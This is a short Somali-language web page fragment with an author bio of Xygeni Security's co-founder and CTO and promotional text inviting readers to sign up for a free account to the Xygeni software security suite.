Louis Rodriguez waa Aasaasaha iyo CTO-ga Xygeni Security. Iyada oo 20+ sano ku jirtay amniga codsiyada, wuxuu diiradda saarayaa ilaalinta AppSec iyo awoodaha falanqaynta koodhka ee horumarsan kuwaas oo ka caawiya kooxaha inay yareeyaan khatarta dhabta ah ee keenista.

 
qalabka-sca-tools-software-ka-samaynta-qalabka-falanqaynta
Mudnaanta sii, hagaaji, oo sug khataraha software-kaaga
Hel Akoonkaaga Bilaashka ah.
Looma baahna kaarka deynta.

Sug Horumarinta Software-kaaga iyo Bixintaada

oo leh Xygeni Product Suite